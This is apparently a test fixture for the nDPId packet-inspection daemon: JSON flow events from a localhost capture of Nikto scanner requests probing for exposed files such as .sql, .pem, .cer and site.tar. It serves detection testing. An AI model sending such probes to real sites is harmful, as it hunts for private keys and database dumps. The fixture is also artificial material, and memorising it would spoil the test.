{"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.sql","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +01050{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":125,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":125,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276864,"flow_last_seen":1576420276864,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420276864,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49794,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.sql","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":126,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":126,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276865,"flow_last_seen":1576420276865,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420276865,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49796,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00665{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":126,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":126,"flow_packet_id":1,"flow_last_seen":1576420276865,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420276865,"pkt":"AAAAAAAAAAAAAAAACABFAADBsWVAAEAGis9\/AAABfwAAAcKEH5CGGYkkbARgroAYAED+tQAAAQEICp1m+6mdZvupR0VUIC8xMjcuMC5zcWwgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"} -01050{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":126,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":126,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276865,"flow_last_seen":1576420276865,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420276865,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49796,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.sql","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +01050{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":126,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":126,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276865,"flow_last_seen":1576420276865,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420276865,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49796,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.sql","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":127,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":127,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276866,"flow_last_seen":1576420276866,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420276866,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49798,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":127,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":127,"flow_packet_id":1,"flow_last_seen":1576420276866,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420276866,"pkt":"AAAAAAAAAAAAAAAACABFAADBsTlAAEAGivt\/AAABfwAAAcKGH5CzxIl4Ool\/aIAYAED+tQAAAQEICp1m+6qdZvuqR0VUIC8xMjcuMC5wZW0gSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"} -01050{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":127,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":127,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276866,"flow_last_seen":1576420276866,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420276866,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49798,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.pem","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +01050{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":127,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":127,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276866,"flow_last_seen":1576420276866,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420276866,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49798,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.pem","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":128,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":128,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276869,"flow_last_seen":1576420276869,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420276869,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49800,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00665{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":128,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":128,"flow_packet_id":1,"flow_last_seen":1576420276869,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420276869,"pkt":"AAAAAAAAAAAAAAAACABFAADBxdFAAEAGdmN\/AAABfwAAAcKIH5BDzv2PC6KyZoAYAED+tQAAAQEICp1m+6ydZvusR0VUIC8xMjcuMC5wZW0gSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01050{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":128,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":128,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276869,"flow_last_seen":1576420276869,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420276869,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49800,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.pem","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +01050{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":128,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":128,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276869,"flow_last_seen":1576420276869,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420276869,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49800,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.pem","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":129,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":129,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276870,"flow_last_seen":1576420276870,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420276870,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49802,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":129,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":129,"flow_packet_id":1,"flow_last_seen":1576420276870,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420276870,"pkt":"AAAAAAAAAAAAAAAACABFAADAIL1AAEAGG3l\/AAABfwAAAcKKH5D\/Dxj7MLgvIIAYAED+tAAAAQEICp1m+66dZvuuR0VUIC9zaXRlLnRhciBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KDQo="} -01049{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":129,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":129,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276870,"flow_last_seen":1576420276870,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420276870,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49802,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/site.tar","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +01049{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":129,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":129,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276870,"flow_last_seen":1576420276870,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420276870,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49802,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/site.tar","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":130,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":130,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276871,"flow_last_seen":1576420276871,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420276871,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49804,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00665{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":130,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":130,"flow_packet_id":1,"flow_last_seen":1576420276871,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420276871,"pkt":"AAAAAAAAAAAAAAAACABFAADAmdRAAEAGomF\/AAABfwAAAcKMH5DqwaGU3VMvd4AYAED+tAAAAQEICp1m+6+dZvuvR0VUIC9zaXRlLnRhciBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01049{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":130,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":130,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276871,"flow_last_seen":1576420276871,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420276871,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49804,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/site.tar","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +01049{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":130,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":130,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276871,"flow_last_seen":1576420276871,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420276871,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49804,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/site.tar","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":131,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":131,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276872,"flow_last_seen":1576420276872,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276872,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49806,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00673{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":131,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":131,"flow_packet_id":1,"flow_last_seen":1576420276872,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420276872,"pkt":"AAAAAAAAAAAAAAAACABFAADFFSZAAEAGJwt\/AAABfwAAAcKOH5D96y1nB6jLDIAYAED+uQAAAQEICp1m+7CdZvuwR0VUIC8xMjcuMC4wLjEuY2VyIEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":131,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":131,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276872,"flow_last_seen":1576420276872,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276872,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49806,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.1.cer","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":131,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":131,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276872,"flow_last_seen":1576420276872,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276872,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49806,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.1.cer","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":132,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":132,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276873,"flow_last_seen":1576420276873,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276873,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49808,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00673{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":132,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":132,"flow_packet_id":1,"flow_last_seen":1576420276873,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420276873,"pkt":"AAAAAAAAAAAAAAAACABFAADFhm9AAEAGtcF\/AAABfwAAAcKQH5BNzL4wefiP1IAYAED+uQAAAQEICp1m+7GdZvuxR0VUIC8xMjcuMC4wLjEuY2VyIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":132,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":132,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276873,"flow_last_seen":1576420276873,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276873,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49808,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.1.cer","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":132,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":132,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276873,"flow_last_seen":1576420276873,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276873,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49808,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.1.cer","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":133,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":133,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276874,"flow_last_seen":1576420276874,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420276874,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49810,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00669{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":133,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":133,"flow_packet_id":1,"flow_last_seen":1576420276874,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420276874,"pkt":"AAAAAAAAAAAAAAAACABFAADCE1BAAEAGKOR\/AAABfwAAAcKSH5DnJisNBZiCk4AYAED+tgAAAQEICp1m+7KdZvuyR0VUIC8xMjcwMDEucGVtIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} 